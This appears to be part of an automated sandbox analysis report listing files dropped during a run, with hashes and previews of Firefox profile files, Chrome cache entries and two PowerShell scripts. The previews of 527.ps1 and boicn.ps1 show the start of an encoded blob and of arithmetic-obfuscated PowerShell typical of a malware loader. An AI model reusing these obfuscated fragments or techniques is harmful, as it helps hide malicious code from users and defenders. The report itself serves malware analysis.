                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "0dbf219f-4e18-464a-957c-ae336603cdcc");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.backgroundErrors", 2);..user_pref("app.update.lastUpdateTime.addon-background-update-timer", 1736889265);..user_pref("app.update.lastUpdateTime.background-update-timer", 1736889265);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 1736889265);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 173688

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\prefs.js (copy)

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1717), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):13162
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.487212618258305
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:192:jnGRvo1YYbBp6PKDLZwxhaXJ6+RLNONy5RuFNBw8dqSl:8e3Fwx9ixvEw90
                                                                                                                                                                                                                                                                                                                                                      MD5:9B801C625E2E1C741D62E2CEBB308F25
                                                                                                                                                                                                                                                                                                                                                      SHA1:7E0A3C91B22AA12755A74CA3A7FF8BA2E6A4B0BA
                                                                                                                                                                                                                                                                                                                                                      SHA-256:CE494323D85F73C6D9588C2D797878AABD381F11C6CAB7D5156F3E807101FFFA
                                                                                                                                                                                                                                                                                                                                                      SHA-512:EEA9CCCDFAF5C798F14E435D3F9254BD2D2FA423184862835050734C274192A3A75FDAE5D56145522050B391AD7BA3FB0A27678DF70702CD5B0C69B5A0542357
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "0dbf219f-4e18-464a-957c-ae336603cdcc");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.backgroundErrors", 2);..user_pref("app.update.lastUpdateTime.addon-background-update-timer", 1736889265);..user_pref("app.update.lastUpdateTime.background-update-timer", 1736889265);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 1736889265);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 173688

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\protections.sqlite

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, user version 1, last written using SQLite version 3042000, page size 32768, file counter 4, database pages 2, cookie 0x1, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.04062825861060003
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:lSGBl/l/zl9l/AltllPltlnKollzvulJOlzALRWemFxu7TuRjBFbrl58lcV+wgn8:ltBl/lqN1K4BEJYqWvLue3FMOrMZ0l
                                                                                                                                                                                                                                                                                                                                                      MD5:60C09456D6362C6FBED48C69AA342C3C
                                                                                                                                                                                                                                                                                                                                                      SHA1:58B6E22DAA48C75958B429F662DEC1C011AE74D3
                                                                                                                                                                                                                                                                                                                                                      SHA-256:FE1A432A2CD096B7EEA870D46D07F5197E34B4D10666E6E1C357FAA3F2FE2389
                                                                                                                                                                                                                                                                                                                                                      SHA-512:936DBC887276EF07732783B50EAFE450A8598B0492B8F6C838B337EF3E8A6EA595E7C7A2FA4B3E881887FAAE2D207B953A4C65ED8C964D93118E00D3E03882BD
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.......x..x..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\sessionCheckpoints.json (copy)

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):90
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.194538242412464
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:YVXKQJAyiVLQwJtJDBA+AJ2LKZXJ3YFwHY:Y9KQOy6Lb1BA+m2L69Yr
                                                                                                                                                                                                                                                                                                                                                      MD5:C4AB2EE59CA41B6D6A6EA911F35BDC00
                                                                                                                                                                                                                                                                                                                                                      SHA1:5942CD6505FC8A9DABA403B082067E1CDEFDFBC4
                                                                                                                                                                                                                                                                                                                                                      SHA-256:00AD9799527C3FD21F3A85012565EAE817490F3E0D417413BF9567BB5909F6A2
                                                                                                                                                                                                                                                                                                                                                      SHA-512:71EA16900479E6AF161E0AAD08C8D1E9DED5868A8D848E7647272F3002E2F2013E16382B677ABE3C6F17792A26293B9E27EC78E16F00BD24BA3D21072BD1CAE2
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:{"profile-after-change":true,"final-ui-startup":true,"sessionstore-windows-restored":true}

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\sessionCheckpoints.json.tmp

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):90
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.194538242412464
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:YVXKQJAyiVLQwJtJDBA+AJ2LKZXJ3YFwHY:Y9KQOy6Lb1BA+m2L69Yr
                                                                                                                                                                                                                                                                                                                                                      MD5:C4AB2EE59CA41B6D6A6EA911F35BDC00
                                                                                                                                                                                                                                                                                                                                                      SHA1:5942CD6505FC8A9DABA403B082067E1CDEFDFBC4
                                                                                                                                                                                                                                                                                                                                                      SHA-256:00AD9799527C3FD21F3A85012565EAE817490F3E0D417413BF9567BB5909F6A2
                                                                                                                                                                                                                                                                                                                                                      SHA-512:71EA16900479E6AF161E0AAD08C8D1E9DED5868A8D848E7647272F3002E2F2013E16382B677ABE3C6F17792A26293B9E27EC78E16F00BD24BA3D21072BD1CAE2
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:{"profile-after-change":true,"final-ui-startup":true,"sessionstore-windows-restored":true}

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\sessionstore-backups\recovery.jsonlz4 (copy)

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:Mozilla lz4 compressed data, originally 5786 bytes
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1515
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.244336343276107
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24:vYSUGliG0XizUXzK7GLXV+N62PHYB+mkDT5sQMGULlBwAHH9Qx2yhw1DCQf9qvAG:ApbXJK7GgNqB+mqGoAHaxI2ukzT8Gj
                                                                                                                                                                                                                                                                                                                                                      MD5:4B494ABE383A95058AFCCDA99C93C137
                                                                                                                                                                                                                                                                                                                                                      SHA1:EC92E3E3BC42A492721026B1664D0BA69211EE7F
                                                                                                                                                                                                                                                                                                                                                      SHA-256:40FD1DEE9F9B2D8F8A3523F57590E2FE057567E4D3BE9D1D92BAF3EBAEB2B4E3
                                                                                                                                                                                                                                                                                                                                                      SHA-512:4C8A8C90B5FDF1F9BA31AB407A5A46669E5B35AC0DEBB75DDD4F8C2FE27FD2558C2CD66B4531B13979FAF353D4CD6B1D37367F9FB4707D3554D55232E8742B0A
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:mozLz40.......{"version":["ses....restore",1],"windows":[{"tab..bentrie...}url":"about:home","title":"New Tab","cacheKey":0,"ID":7,"docshellUUID":"{8f522e83-031a-41df-9c37-f0e68fbdde27}","resultPrincipalURI":null,"p....ToInherit_base64":"{\"0\":...\"moz-null4...:{174042d6-5da8-431b-b50c-8a09cbba0728}\"}}","hasUserInteractA...false,"triggeringP\.....3...E..6docIdentifier":8,"persist":true}],"lastAccessed":1736889253932,"hiddey..searchMode...userContextId|..attribut....{},"index":1,"requestedI..p0,"imag....chrome://branding/cU..nt/icon32.png"..aselect...,"_closedT5.@],"_...C....GroupCount":-1,"busy...r...Flags":2167541758....dth":1164,"height":891,"screenX":4...Y..Aizem...."minimized","workspace...."544a81f3-86cf-4601-b565-c8cb2ca3983a","z...1...W"..1..............U.1":{..jUpdate...6,"startTim..P32718...centCrash...0},"global..Dcook.. ho;..."addons.mozilla.org","valu.. 7cO..*9745a185df1b235fd3ecf9e918cb7cd2b41b705581b7355f517422d41;. pa..p"/","na..`"taarI..bsecure...,"httponly..fexpiry..

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\sessionstore-backups\recovery.jsonlz4.tmp

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:Mozilla lz4 compressed data, originally 5786 bytes
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1515
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.244336343276107
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24:vYSUGliG0XizUXzK7GLXV+N62PHYB+mkDT5sQMGULlBwAHH9Qx2yhw1DCQf9qvAG:ApbXJK7GgNqB+mqGoAHaxI2ukzT8Gj
                                                                                                                                                                                                                                                                                                                                                      MD5:4B494ABE383A95058AFCCDA99C93C137
                                                                                                                                                                                                                                                                                                                                                      SHA1:EC92E3E3BC42A492721026B1664D0BA69211EE7F
                                                                                                                                                                                                                                                                                                                                                      SHA-256:40FD1DEE9F9B2D8F8A3523F57590E2FE057567E4D3BE9D1D92BAF3EBAEB2B4E3
                                                                                                                                                                                                                                                                                                                                                      SHA-512:4C8A8C90B5FDF1F9BA31AB407A5A46669E5B35AC0DEBB75DDD4F8C2FE27FD2558C2CD66B4531B13979FAF353D4CD6B1D37367F9FB4707D3554D55232E8742B0A
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:mozLz40.......{"version":["ses....restore",1],"windows":[{"tab..bentrie...}url":"about:home","title":"New Tab","cacheKey":0,"ID":7,"docshellUUID":"{8f522e83-031a-41df-9c37-f0e68fbdde27}","resultPrincipalURI":null,"p....ToInherit_base64":"{\"0\":...\"moz-null4...:{174042d6-5da8-431b-b50c-8a09cbba0728}\"}}","hasUserInteractA...false,"triggeringP\.....3...E..6docIdentifier":8,"persist":true}],"lastAccessed":1736889253932,"hiddey..searchMode...userContextId|..attribut....{},"index":1,"requestedI..p0,"imag....chrome://branding/cU..nt/icon32.png"..aselect...,"_closedT5.@],"_...C....GroupCount":-1,"busy...r...Flags":2167541758....dth":1164,"height":891,"screenX":4...Y..Aizem...."minimized","workspace...."544a81f3-86cf-4601-b565-c8cb2ca3983a","z...1...W"..1..............U.1":{..jUpdate...6,"startTim..P32718...centCrash...0},"global..Dcook.. ho;..."addons.mozilla.org","valu.. 7cO..*9745a185df1b235fd3ecf9e918cb7cd2b41b705581b7355f517422d41;. pa..p"/","na..`"taarI..bsecure...,"httponly..fexpiry..

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\targeting.snapshot.json (copy)

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):4537
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.032539570921985
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:48:YrSAYAfpUQZpExB1+anOdWtVheTV2hWUzzc89YMsku7f86SLAVL7Kl5FtsfAcbyk:ycAfdTEr59kUzzctvbw6KkqRrc2Rn27
                                                                                                                                                                                                                                                                                                                                                      MD5:BFECA4A78ECD60F8AAAD61A86018E500
                                                                                                                                                                                                                                                                                                                                                      SHA1:286C05D6C29CED67ED15F6F3EAECCB67AA23D000
                                                                                                                                                                                                                                                                                                                                                      SHA-256:807BC88BF6275E8E1C078A285F0F9218A82B9B72BAFC2DA44E783BA096319A6D
                                                                                                                                                                                                                                                                                                                                                      SHA-512:EB27CE5C32EFAB54CC2D12FCFDD043967BEA4FBE3BB062D5E5C388E15515052A185D227975CF4B87722A32E3CD61964E860479E0D7CD8885952EDD285E8BEC22
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:{"environment":{"locale":"en-US","localeLanguageCode":"en","browserSettings":{"update":{"channel":"release","enabled":true,"autoDownload":true,"background":true}},"attributionData":{"campaign":"%2528not%2Bset%2529","content":"%2528not%2Bset%2529","dlsource":"mozorg","dltoken":"cd09ae95-e2cf-4b8b-8929-791b0dd48cdd","experiment":"%2528not%2Bset%2529","medium":"referral","source":"www.google.com","ua":"chrome","variation":"%2528not%2Bset%2529"},"currentDate":"2025-01-14T21:14:10.759Z","profileAgeCreated":1696583300378,"usesFirefoxSync":false,"isFxAEnabled":true,"isFxASignedIn":false,"sync":{"desktopDevices":0,"mobileDevices":0,"totalDevices":0},"xpinstallEnabled":true,"addonsInfo":{"addons":{"formautofill@mozilla.org":{"version":"1.0.1","type":"extension","isSystem":true,"isWebExtension":true,"name":"Form Autofill","userDisabled":false,"installDate":"2023-09-28T01:41:23.000Z"},"pictureinpicture@mozilla.org":{"version":"1.0.0","type":"extension","isSystem":true,"isWebExtension":true,"name"

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\targeting.snapshot.json.tmp

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):4537
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.032539570921985
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:48:YrSAYAfpUQZpExB1+anOdWtVheTV2hWUzzc89YMsku7f86SLAVL7Kl5FtsfAcbyk:ycAfdTEr59kUzzctvbw6KkqRrc2Rn27
                                                                                                                                                                                                                                                                                                                                                      MD5:BFECA4A78ECD60F8AAAD61A86018E500
                                                                                                                                                                                                                                                                                                                                                      SHA1:286C05D6C29CED67ED15F6F3EAECCB67AA23D000
                                                                                                                                                                                                                                                                                                                                                      SHA-256:807BC88BF6275E8E1C078A285F0F9218A82B9B72BAFC2DA44E783BA096319A6D
                                                                                                                                                                                                                                                                                                                                                      SHA-512:EB27CE5C32EFAB54CC2D12FCFDD043967BEA4FBE3BB062D5E5C388E15515052A185D227975CF4B87722A32E3CD61964E860479E0D7CD8885952EDD285E8BEC22
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:{"environment":{"locale":"en-US","localeLanguageCode":"en","browserSettings":{"update":{"channel":"release","enabled":true,"autoDownload":true,"background":true}},"attributionData":{"campaign":"%2528not%2Bset%2529","content":"%2528not%2Bset%2529","dlsource":"mozorg","dltoken":"cd09ae95-e2cf-4b8b-8929-791b0dd48cdd","experiment":"%2528not%2Bset%2529","medium":"referral","source":"www.google.com","ua":"chrome","variation":"%2528not%2Bset%2529"},"currentDate":"2025-01-14T21:14:10.759Z","profileAgeCreated":1696583300378,"usesFirefoxSync":false,"isFxAEnabled":true,"isFxASignedIn":false,"sync":{"desktopDevices":0,"mobileDevices":0,"totalDevices":0},"xpinstallEnabled":true,"addonsInfo":{"addons":{"formautofill@mozilla.org":{"version":"1.0.1","type":"extension","isSystem":true,"isWebExtension":true,"name":"Form Autofill","userDisabled":false,"installDate":"2023-09-28T01:41:23.000Z"},"pictureinpicture@mozilla.org":{"version":"1.0.0","type":"extension","isSystem":true,"isWebExtension":true,"name"

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\Desktop\527\527.ps1

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\7-Zip\7zG.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):3179333
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.001308946799799
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:49152:U+x3EixTqfH3LXa1XHRwf6wrFmazg+mrG6Fj2FXwV:p
                                                                                                                                                                                                                                                                                                                                                      MD5:3123E4DFD1F0514DC18CF84688854E23
                                                                                                                                                                                                                                                                                                                                                      SHA1:36C947A1DFB747C5E7964E549A6D3F20C3223446
                                                                                                                                                                                                                                                                                                                                                      SHA-256:DB0975704EC411DAF247E177F3EF12C0DEE36D47DEC713B90E79BD49CD2F163E
                                                                                                                                                                                                                                                                                                                                                      SHA-512:21EB2F5AECD9B62CF37589F2E9E0EF6FE73A65CD9BB2758742B5DDCED59A74664CDEACF6589D458CD1D5508166556082F474B99DB0059F394548A457C40219EE
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:$no768xrud1w2bsz = "Z+U6ZnA4aGN2ZUMtf1quu6N3nHXvdcUwb/NSy65znL1JNEX1Lfmad1zpE0Q4kX0SPd5YMN/pMyedSRHIBZHtv8Pf8doB+l4En6DOAJakLyRxduyFsf0VHj8CY1g+7/VU52RL1E2JqVYJ5+gpzZ1Ak8RHhWsA+T55SF/qJ04B5XP+BgBmuCPAa8O1KZwaDAu1SI0pBcP15rDBHINhA/BCQeixE06rqO5Z8yK4T22s48gLfOgoHRWesL4rWfT+7NOKRjfLG+0XREoPbpC997eRQU4xMl7LGqtKsbOgvErNFkiuQyfDPXI4rMetzBoacXV4tTSTFyJl0AVs3qDL8Z9dOcyx8eQVYycbOxFHE85Y72gYg2aL99WmGdXWLyTlEiMQgVJZm+ckRRIjy0JpaCYekqX/laXTgrGJgmHHoG7eC43uAhQA30aM4QOzN9t1F/b9l5e2+aG5ARCsEUf5v+fVLKjqkNg1Iy4vL1RGWhvB603KUM2XIbU4eTDarhtvEzYWgnOu4avetzXZaSIyRVKgSXUaLVnbWWjrzJ2suM/xYbGQn8IeVnyEvqaGw97DZbCzihc1A2YkYy+Ym96Gr2pkzGp1c4SFuPRfmohsNmPEORY7Lcb1UZxZjiYAxHdkwLrQhLZb8THDrx/myIjeY9Wyd3nr52MIHpRQQGZ9OBEWdJlw9MvbHgTIua+klrIseFOjwN9h3Z9tcMS6a9jcMGXCQq2CHBe5iM5QCwk+ev37lIeRCrtdYFibkxyiNT+pTNShtIWREEmJkxHoVIqawDXtHpbYaCDTmCxgNPqsLKuKA1X2yz+VK+niVevdMlSVWXQQ5kRMapa4YNbAWlhy+FjdDrogslWAxkz+WhJCWXwpCU9FKtlPUunV7dfxHSc4XanWJQTApSLIatZPRe0FoSNtKviWjdGblnfED9FifizIuQF6jxqahmre/q19l4AlbCsfpLzhhXeEX3KBRIqqyab7

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\Desktop\527\boicn.ps1

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\7-Zip\7zG.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (10739)
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):19160
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.011261050746465
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:384:r7r3U9QIzR1Yof/6U7Mu/nG3bYVJ2PFDh89ssb1mU/1:fraRaoHau/6sMg9sGsa
                                                                                                                                                                                                                                                                                                                                                      MD5:95E836F844271D872C1DFB273DE12498
                                                                                                                                                                                                                                                                                                                                                      SHA1:0AE2B226CDBF9AF9DF010EC9B577084BB65BE370
                                                                                                                                                                                                                                                                                                                                                      SHA-256:F499A7A6DBF8D0B82B6EF4111203D442A9D7D5CEE6ACDB5751E870D88C2C83F9
                                                                                                                                                                                                                                                                                                                                                      SHA-512:D9CA46654020A60FE25C71B5E0DA77387498B8217CE790E4546C493E1F42810A061AD426735C48F9B8CEFA38227163DEB91045E4657759AAB52D714614F7A845
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:$cqhtojrfusblnm=$executioncontext;$ederreononedesenenalaterrealonorisenal = (-jOIn (@((5271-5218),(90480/1740),(256215/(36823040/8192)),(-7139+7189),(-7141+(5120+(1394+683))),(516564/9566),(5199-(9508-4365)),(131285/2387),(269170/(13756-8862)),(9368-(14222-4904)),(-3272+3328),(-7965+(22051776/(12511-(1567+8192)))),(-19+68),(-4776+(42744688/8848)),(25376/488),(322224/(3424+2330)),(510840/9460),(8711-(5159+(3666-170))),(-7675+7731),(-711+(4096-3336)),(7227-7173),(2169-(2537-424)),(1801-(-427+2173)),(1934-1882),(74305/(-2465+3816)),(-3243+3293),(-9109+9165),(-8204+(-1338+(7735+1855))),(-8002+8057),(253450/5069),(399840/(5155+1985)),(-7277+(-4+7330)),(3220-(287924/(-7118+7209))),(-1095+(5920200/(7386-2238))),(-4408+4457),(506110/9202),(3674-(2782+(-7343+(6256+1928)))),(-6896+6950),(-339+395),(864-808),(7598-(60728184/8052)),(5925-5870),(270872/4837),(92950/(249+(-7797+(15060607/(874146/546))))),(1218-(4503-(5057-1716))),(271056/5647),(-94+(18944/(776832/6069))),(-7408+7464),(5237-5181),(-3

                                                                                                                                                                                                                                                                                                                                                      Chrome Cache Entry: 149

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (819)
                                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):824
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.151421972306547
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24:j5W7oLiMkO2BHslgT9lCuABATluoB7HHHHHHHYqmffffffo:j5WM9kRKlgZ01BAxuSEqmffffffo
                                                                                                                                                                                                                                                                                                                                                      MD5:2CA1A00304976B40A0FFF0DADEB3FB30
                                                                                                                                                                                                                                                                                                                                                      SHA1:2068E467C2DD9D61B22F5BB3F30A095D7FA010DC
                                                                                                                                                                                                                                                                                                                                                      SHA-256:B6E007EBEA3845AB5259AB6CFAA0B95C1E7C717644464A3F3167C11C335995C9
                                                                                                                                                                                                                                                                                                                                                      SHA-512:ADFEBC9F7728DA9C5EBAED4C342C929192650D1BC49E5930AF108358A8017A5C77527A242642FA7E0F8AC19247679FFB0C3C503AF309D12683C90ADB42492F77
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                                                                                                                                                                      Preview:)]}'.["",["powerball lottery numbers","nfl kansas city chiefs","lincoln wheat penny rare coin","warzone update patch notes","moon mars occultation","sb mowing gofundme beth","east tennessee school closings","jpmorgan chase bank"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggesteventid":"3700822862954002470","google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]

                                                                                                                                                                                                                                                                                                                                                      Chrome Cache Entry: 150

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (2410)
                                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):175017
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.547141709627909
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3072:ZzKYRicPAENEJ8X5rpzKSoi5O4NmHha+q5ByukhCOWomLCHiYyKfQ1fbK0jOJv6B:ZzKYRPAENEJ+pKSoUO4NmHhbq5ByukhM
                                                                                                                                                                                                                                                                                                                                                      MD5:DE73B70C2E96AA995C1D89F9DE01D399
                                                                                                                                                                                                                                                                                                                                                      SHA1:D72592A0BF7FC706B4063B146FA0F505D9598E37
                                                                                                                                                                                                                                                                                                                                                      SHA-256:47051D5F0947B959605CA98298809213203547BD992E9EC13557B40547F5228F
                                                                                                                                                                                                                                                                                                                                                      SHA-512:7C01A3EC31D67C79BDBFFCF166E8F61DFED6EBCEF56F0BBFAE4EFAA363E0F797E397C054183AC16515F1AA34B1C6E19ABB2EBF3F9C5CA85EEAE9B173D657028B
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      URL:"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.WSo7OLdFZck.2019.O/rt=j/m=q_dnp,qmd,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTu3OIbomB3nx1wiDyRkhdiMoOpjsA"
